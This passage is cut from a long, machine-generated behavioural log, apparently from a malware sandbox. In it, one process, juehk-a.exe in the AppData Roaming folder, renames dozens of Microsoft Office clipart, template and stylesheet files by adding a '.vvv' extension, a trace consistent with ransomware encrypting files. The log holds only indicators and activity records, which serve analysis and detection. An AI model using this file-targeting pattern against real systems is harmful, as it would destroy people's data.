31958.            pid: 1648
31959.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31960.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31961.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02069J.JPG
31962.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02069J.JPG.vvv
31963.            ads:
31964.          fid (ads:): 562949953499012
31965.          ntstatus: 0x0
31966.          CreateOptions: 0x0
31967.        file:
31968.          timestamp: 98152
31969.          mode: rename
31970.          sequenceNumber: 2249
31971.          filesize: 3966
31972.          processinfo:
31973.            pid: 1648
31974.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31975.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31976.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02412K.JPG
31977.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02412K.JPG.vvv
31978.            ads:
31979.          fid (ads:): 562949953499019
31980.          ntstatus: 0x0
31981.          CreateOptions: 0x0
31982.        file:
31983.          timestamp: 98163
31984.          mode: rename
31985.          sequenceNumber: 2250
31986.          filesize: 34366
31987.          processinfo:
31988.            pid: 1648
31989.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31990.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31991.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02567J.JPG
31992.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02567J.JPG.vvv
31993.            ads:
31994.          fid (ads:): 562949953499024
31995.          ntstatus: 0x0
31996.          CreateOptions: 0x0
31997.        file:
31998.          timestamp: 98185
31999.          mode: rename
32000.          sequenceNumber: 2251
32001.          filesize: 41598
32002.          processinfo:
32003.            pid: 1648
32004.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32005.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32006.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02759J.JPG
32007.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02759J.JPG.vvv
32008.            ads:
32009.          fid (ads:): 562949953499049
32010.          ntstatus: 0x0
32011.          CreateOptions: 0x0
32012.        file:
32013.          timestamp: 98196
32014.          mode: rename
32015.          sequenceNumber: 2252
32016.          filesize: 51070
32017.          processinfo:
32018.            pid: 1648
32019.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32020.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32021.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02810J.JPG
32022.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02810J.JPG.vvv
32023.            ads:
32024.          fid (ads:): 562949953499050
32025.          ntstatus: 0x0
32026.          CreateOptions: 0x0
32027.        file:
32028.          timestamp: 98208
32029.          mode: rename
32030.          sequenceNumber: 2253
32031.          filesize: 62942
32032.          processinfo:
32033.            pid: 1648
32034.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32035.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32036.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02829J.JPG
32037.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02829J.JPG.vvv
32038.            ads:
32039.          fid (ads:): 562949953499051
32040.          ntstatus: 0x0
32041.          CreateOptions: 0x0
32042.        file:
32043.          timestamp: 98219
32044.          mode: rename
32045.          sequenceNumber: 2254
32046.          filesize: 15854
32047.          processinfo:
32048.            pid: 1648
32049.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32050.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32051.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02897J.JPG
32052.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02897J.JPG.vvv
32053.            ads:
32054.          fid (ads:): 562949953499053
32055.          ntstatus: 0x0
32056.          CreateOptions: 0x0
32057.        file:
32058.          timestamp: 98231
32059.          mode: rename
32060.          sequenceNumber: 2255
32061.          filesize: 31310
32062.          processinfo:
32063.            pid: 1648
32064.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32065.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32066.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03041I.JPG
32067.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03041I.JPG.vvv
32068.            ads:
32069.          fid (ads:): 562949953499057
32070.          ntstatus: 0x0
32071.          CreateOptions: 0x0
32072.        file:
32073.          timestamp: 98242
32074.          mode: rename
32075.          sequenceNumber: 2256
32076.          filesize: 30206
32077.          processinfo:
32078.            pid: 1648
32079.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32080.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32081.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03143I.JPG
32082.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03143I.JPG.vvv
32083.            ads:
32084.          fid (ads:): 562949953499058
32085.          ntstatus: 0x0
32086.          CreateOptions: 0x0
32087.        file:
32088.          timestamp: 98253
32089.          mode: rename
32090.          sequenceNumber: 2257
32091.          filesize: 42222
32092.          processinfo:
32093.            pid: 1648
32094.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32095.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32096.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03205I.JPG
32097.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03205I.JPG.vvv
32098.            ads:
32099.          fid (ads:): 562949953499059
32100.          ntstatus: 0x0
32101.          CreateOptions: 0x0
32102.        file:
32103.          timestamp: 98265
32104.          mode: rename
32105.          sequenceNumber: 2258
32106.          filesize: 42478
32107.          processinfo:
32108.            pid: 1648
32109.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32110.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32111.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03224I.JPG
32112.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03224I.JPG.vvv
32113.            ads:
32114.          fid (ads:): 562949953499060
32115.          ntstatus: 0x0
32116.          CreateOptions: 0x0
32117.        file:
32118.          timestamp: 98276
32119.          mode: rename
32120.          sequenceNumber: 2259
32121.          filesize: 11598
32122.          processinfo:
32123.            pid: 1648
32124.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32125.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32126.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03379I.JPG
32127.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03379I.JPG.vvv
32128.            ads:
32129.          fid (ads:): 562949953499061
32130.          ntstatus: 0x0
32131.          CreateOptions: 0x0
32132.        file:
32133.          timestamp: 98286
32134.          mode: rename
32135.          sequenceNumber: 2260
32136.          filesize: 13246
32137.          processinfo:
32138.            pid: 1648
32139.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32140.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32141.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03380I.JPG
32142.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03380I.JPG.vvv
32143.            ads:
32144.          fid (ads:): 562949953499062
32145.          ntstatus: 0x0
32146.          CreateOptions: 0x0
32147.        file:
32148.          timestamp: 98298
32149.          mode: rename
32150.          sequenceNumber: 2261
32151.          filesize: 48974
32152.          processinfo:
32153.            pid: 1648
32154.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32155.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32156.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03425I.JPG
32157.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03425I.JPG.vvv
32158.            ads:
32159.          fid (ads:): 562949953499063
32160.          ntstatus: 0x0
32161.          CreateOptions: 0x0
32162.        file:
32163.          timestamp: 98430
32164.          mode: rename
32165.          sequenceNumber: 2262
32166.          filesize: 606
32167.          processinfo:
32168.            pid: 1648
32169.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32170.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32171.          old_name: C:\Program Files\Microsoft Office\Office15\1033\DataServices\+Connect to New Data Source.odc
32172.          new_name: C:\Program Files\Microsoft Office\Office15\1033\DataServices\+Connect to New Data Source.odc.vvv
32173.            ads:
32174.          fid (ads:): 5066549580849863
32175.          ntstatus: 0x0
32176.          CreateOptions: 0x0
32177.        file:
32178.          timestamp: 98443
32179.          mode: rename
32180.          sequenceNumber: 2263
32181.          filesize: 622
32182.          processinfo:
32183.            pid: 1648
32184.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32185.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32186.          old_name: C:\Program Files\Microsoft Office\Office15\1033\DataServices\+NewSQLServerConnection.odc
32187.          new_name: C:\Program Files\Microsoft Office\Office15\1033\DataServices\+NewSQLServerConnection.odc.vvv
32188.            ads:
32189.          fid (ads:): 562949953496020
32190.          ntstatus: 0x0
32191.          CreateOptions: 0x0
32192.        file:
32193.          timestamp: 98496
32194.          mode: rename
32195.          sequenceNumber: 2264
32196.          filesize: 20398
32197.          processinfo:
32198.            pid: 1648
32199.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32200.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32201.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PROTTPLN.DOC
32202.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PROTTPLN.DOC.vvv
32203.            ads:
32204.          fid (ads:): 562949953496313
32205.          ntstatus: 0x0
32206.          CreateOptions: 0x0
32207.        file:
32208.          timestamp: 98522
32209.          mode: rename
32210.          sequenceNumber: 2265
32211.          filesize: 12718
32212.          processinfo:
32213.            pid: 1648
32214.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32215.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32216.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PROTTPLN.PPT
32217.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PROTTPLN.PPT.vvv
32218.            ads:
32219.          fid (ads:): 562949953496050
32220.          ntstatus: 0x0
32221.          CreateOptions: 0x0
32222.        file:
32223.          timestamp: 98592
32224.          mode: rename
32225.          sequenceNumber: 2266
32226.          filesize: 9134
32227.          processinfo:
32228.            pid: 1648
32229.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32230.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32231.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PROTTPLN.XLS
32232.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PROTTPLN.XLS.vvv
32233.            ads:
32234.          fid (ads:): 562949953496314
32235.          ntstatus: 0x0
32236.          CreateOptions: 0x0
32237.        file:
32238.          timestamp: 98645
32239.          mode: rename
32240.          sequenceNumber: 2267
32241.          filesize: 20398
32242.          processinfo:
32243.            pid: 1648
32244.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32245.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32246.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PROTTPLV.DOC
32247.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PROTTPLV.DOC.vvv
32248.            ads:
32249.          fid (ads:): 562949953496315
32250.          ntstatus: 0x0
32251.          CreateOptions: 0x0
32252.        file:
32253.          timestamp: 98666
32254.          mode: rename
32255.          sequenceNumber: 2268
32256.          filesize: 12718
32257.          processinfo:
32258.            pid: 1648
32259.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32260.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32261.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PROTTPLV.PPT
32262.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PROTTPLV.PPT.vvv
32263.            ads:
32264.          fid (ads:): 562949953496051
32265.          ntstatus: 0x0
32266.          CreateOptions: 0x0
32267.        file:
32268.          timestamp: 98686
32269.          mode: rename
32270.          sequenceNumber: 2269
32271.          filesize: 9134
32272.          processinfo:
32273.            pid: 1648
32274.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32275.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32276.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PROTTPLV.XLS
32277.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PROTTPLV.XLS.vvv
32278.            ads:
32279.          fid (ads:): 562949953496316
32280.          ntstatus: 0x0
32281.          CreateOptions: 0x0
32282.        file:
32283.          timestamp: 98740
32284.          mode: rename
32285.          sequenceNumber: 2270
32286.          filesize: 127054
32287.          processinfo:
32288.            pid: 1648
32289.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32290.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32291.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME01.CSS
32292.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME01.CSS.vvv
32293.            ads:
32294.          fid (ads:): 562949953496466
32295.          ntstatus: 0x0
32296.          CreateOptions: 0x0
32297.        file:
32298.          timestamp: 98765
32299.          mode: rename
32300.          sequenceNumber: 2271
32301.          filesize: 130398
32302.          processinfo:
32303.            pid: 1648
32304.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32305.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32306.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME02.CSS
32307.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME02.CSS.vvv
32308.            ads:
32309.          fid (ads:): 562949953496467
32310.          ntstatus: 0x0
32311.          CreateOptions: 0x0
32312.        file:
32313.          timestamp: 98797
32314.          mode: rename
32315.          sequenceNumber: 2272
32316.          filesize: 127438
32317.          processinfo:
32318.            pid: 1648
32319.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32320.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32321.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME03.CSS
32322.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME03.CSS.vvv
32323.            ads:
32324.          fid (ads:): 562949953496468
32325.          ntstatus: 0x0
32326.          CreateOptions: 0x0
32327.        file:
32328.          timestamp: 98820
32329.          mode: rename
32330.          sequenceNumber: 2273
32331.          filesize: 128654
32332.          processinfo:
32333.            pid: 1648
32334.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32335.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32336.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME04.CSS
32337.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME04.CSS.vvv
32338.            ads:
32339.          fid (ads:): 562949953496469
32340.          ntstatus: 0x0
32341.          CreateOptions: 0x0
32342.        file:
32343.          timestamp: 98833
32344.          mode: rename
32345.          sequenceNumber: 2274
32346.          filesize: 126814
32347.          processinfo:
32348.            pid: 1648
32349.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32350.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32351.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME05.CSS
32352.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME05.CSS.vvv
32353.            ads:
32354.          fid (ads:): 562949953496470
32355.          ntstatus: 0x0
32356.          CreateOptions: 0x0
32357.        file:
32358.          timestamp: 98859
32359.          mode: rename
32360.          sequenceNumber: 2275
32361.          filesize: 128126
32362.          processinfo:
32363.            pid: 1648
32364.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32365.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32366.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME06.CSS
32367.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME06.CSS.vvv
32368.            ads:
32369.          fid (ads:): 562949953496471
32370.          ntstatus: 0x0
32371.          CreateOptions: 0x0
32372.        file:
32373.          timestamp: 98883
32374.          mode: rename
32375.          sequenceNumber: 2276
32376.          filesize: 131326
32377.          processinfo:
32378.            pid: 1648
32379.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32380.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32381.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME07.CSS
32382.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME07.CSS.vvv
32383.            ads:
32384.          fid (ads:): 562949953496472
32385.          ntstatus: 0x0
32386.          CreateOptions: 0x0
32387.        file:
32388.          timestamp: 98916
32389.          mode: rename
32390.          sequenceNumber: 2277
32391.          filesize: 129854
32392.          processinfo:
32393.            pid: 1648
32394.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32395.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32396.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME08.CSS
32397.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME08.CSS.vvv
32398.            ads:
32399.          fid (ads:): 562949953496473
32400.          ntstatus: 0x0
32401.          CreateOptions: 0x0
32402.        file:
32403.          timestamp: 98940
32404.          mode: rename
32405.          sequenceNumber: 2278
32406.          filesize: 132590
32407.          processinfo:
32408.            pid: 1648
32409.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32410.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32411.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME09.CSS
32412.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME09.CSS.vvv
32413.            ads:
32414.          fid (ads:): 562949953496474
32415.          ntstatus: 0x0
32416.          CreateOptions: 0x0
32417.        file:
32418.          timestamp: 98977
32419.          mode: rename
32420.          sequenceNumber: 2279
32421.          filesize: 133326
32422.          processinfo:
32423.            pid: 1648
32424.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32425.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32426.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME10.CSS
32427.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME10.CSS.vvv
32428.            ads:
32429.          fid (ads:): 562949953496475
32430.          ntstatus: 0x0
32431.          CreateOptions: 0x0
32432.        file:
32433.          timestamp: 99010
32434.          mode: rename
32435.          sequenceNumber: 2280
32436.          filesize: 131550
32437.          processinfo:
32438.            pid: 1648
32439.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32440.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32441.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME11.CSS
32442.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME11.CSS.vvv
32443.            ads:
32444.          fid (ads:): 562949953496476
32445.          ntstatus: 0x0
32446.          CreateOptions: 0x0
32447.        file:
32448.          timestamp: 99039
32449.          mode: rename
32450.          sequenceNumber: 2281
32451.          filesize: 123454
32452.          processinfo:
32453.            pid: 1648
32454.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32455.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32456.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME12.CSS
32457.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME12.CSS.vvv
32458.            ads:
32459.          fid (ads:): 562949953496477
32460.          ntstatus: 0x0
32461.          CreateOptions: 0x0
32462.        file:
32463.          timestamp: 99069
32464.          mode: rename
32465.          sequenceNumber: 2282
32466.          filesize: 126526
32467.          processinfo:
32468.            pid: 1648
32469.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32470.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32471.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME13.CSS
32472.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME13.CSS.vvv
32473.            ads:
32474.          fid (ads:): 562949953496478
32475.          ntstatus: 0x0
32476.          CreateOptions: 0x0
32477.        file:
32478.          timestamp: 99083
32479.          mode: rename
32480.          sequenceNumber: 2283
32481.          filesize: 128878
32482.          processinfo:
32483.            pid: 1648
32484.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32485.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32486.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME14.CSS
32487.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME14.CSS.vvv
32488.            ads:
32489.          fid (ads:): 562949953496479
32490.          ntstatus: 0x0
32491.          CreateOptions: 0x0
32492.        file:
32493.          timestamp: 99127
32494.          mode: rename
32495.          sequenceNumber: 2284
32496.          filesize: 123454
32497.          processinfo:
32498.            pid: 1648
32499.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32500.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32501.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME15.CSS
32502.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME15.CSS.vvv
32503.            ads:
32504.          fid (ads:): 562949953496480
32505.          ntstatus: 0x0
32506.          CreateOptions: 0x0
32507.        file:
32508.          timestamp: 99140
32509.          mode: rename
32510.          sequenceNumber: 2285
32511.          filesize: 129486
32512.          processinfo:
32513.            pid: 1648
32514.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32515.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32516.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME16.CSS
32517.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME16.CSS.vvv
32518.            ads:
32519.          fid (ads:): 562949953496481
32520.          ntstatus: 0x0
32521.          CreateOptions: 0x0
32522.        file:
32523.          timestamp: 99175
32524.          mode: rename
32525.          sequenceNumber: 2286
32526.          filesize: 126078
32527.          processinfo:
32528.            pid: 1648
32529.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32530.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32531.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME17.CSS
32532.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME17.CSS.vvv
32533.            ads:
32534.          fid (ads:): 562949953496482
32535.          ntstatus: 0x0
32536.          CreateOptions: 0x0
32537.        file:
32538.          timestamp: 99190
32539.          mode: rename
32540.          sequenceNumber: 2287
32541.          filesize: 132574
32542.          processinfo:
32543.            pid: 1648
32544.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32545.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32546.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME18.CSS
32547.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME18.CSS.vvv
32548.            ads:
32549.          fid (ads:): 562949953496483
32550.          ntstatus: 0x0
32551.          CreateOptions: 0x0
32552.        file:
32553.          timestamp: 99213
32554.          mode: rename
32555.          sequenceNumber: 2288
32556.          filesize: 131486
32557.          processinfo:
32558.            pid: 1648
32559.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32560.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32561.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME19.CSS
32562.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME19.CSS.vvv
32563.            ads:
32564.          fid (ads:): 562949953496484
32565.          ntstatus: 0x0
32566.          CreateOptions: 0x0
32567.        file:
32568.          timestamp: 99227
32569.          mode: rename
32570.          sequenceNumber: 2289
32571.          filesize: 129182
32572.          processinfo:
32573.            pid: 1648
32574.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32575.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32576.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME20.CSS
32577.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME20.CSS.vvv
32578.            ads:
32579.          fid (ads:): 562949953496485
32580.          ntstatus: 0x0
32581.          CreateOptions: 0x0
32582.        file:
32583.          timestamp: 99240
32584.          mode: rename
32585.          sequenceNumber: 2290
32586.          filesize: 126094
32587.          processinfo:
32588.            pid: 1648
32589.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32590.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32591.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME21.CSS
32592.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME21.CSS.vvv
32593.            ads:
32594.          fid (ads:): 562949953496486
32595.          ntstatus: 0x0
32596.          CreateOptions: 0x0
32597.        file:
32598.          timestamp: 99271
32599.          mode: rename
32600.          sequenceNumber: 2291
32601.          filesize: 130670
32602.          processinfo:
32603.            pid: 1648
32604.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32605.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32606.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME22.CSS
32607.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME22.CSS.vvv
32608.            ads:
32609.          fid (ads:): 562949953496487
32610.          ntstatus: 0x0
32611.          CreateOptions: 0x0
32612.        file:
32613.          timestamp: 99300
32614.          mode: rename
32615.          sequenceNumber: 2292
32616.          filesize: 128926
32617.          processinfo:
32618.            pid: 1648
32619.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32620.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32621.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME23.CSS
32622.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME23.CSS.vvv
32623.            ads:
32624.          fid (ads:): 562949953496488
32625.          ntstatus: 0x0
32626.          CreateOptions: 0x0
32627.        file:
32628.          timestamp: 99334
32629.          mode: rename
32630.          sequenceNumber: 2293
32631.          filesize: 126942
32632.          processinfo:
32633.            pid: 1648
32634.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32635.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32636.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME24.CSS
32637.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME24.CSS.vvv
32638.            ads:
32639.          fid (ads:): 562949953496489
32640.          ntstatus: 0x0
32641.          CreateOptions: 0x0
32642.        file:
32643.          timestamp: 99346
32644.          mode: rename
32645.          sequenceNumber: 2294
32646.          filesize: 130702
32647.          processinfo:
32648.            pid: 1648
32649.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32650.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32651.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME25.CSS
32652.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME25.CSS.vvv
32653.            ads:
32654.          fid (ads:): 562949953496490
32655.          ntstatus: 0x0
32656.          CreateOptions: 0x0
32657.        file:
32658.          timestamp: 99361
32659.          mode: rename
32660.          sequenceNumber: 2295
32661.          filesize: 119646
32662.          processinfo:
32663.            pid: 1648
32664.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32665.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32666.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME26.CSS
32667.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME26.CSS.vvv
32668.            ads:
32669.          fid (ads:): 562949953496491
32670.          ntstatus: 0x0
32671.          CreateOptions: 0x0
32672.        file:
32673.          timestamp: 99375
32674.          mode: rename
32675.          sequenceNumber: 2296
32676.          filesize: 123438
32677.          processinfo:
32678.            pid: 1648
32679.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32680.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
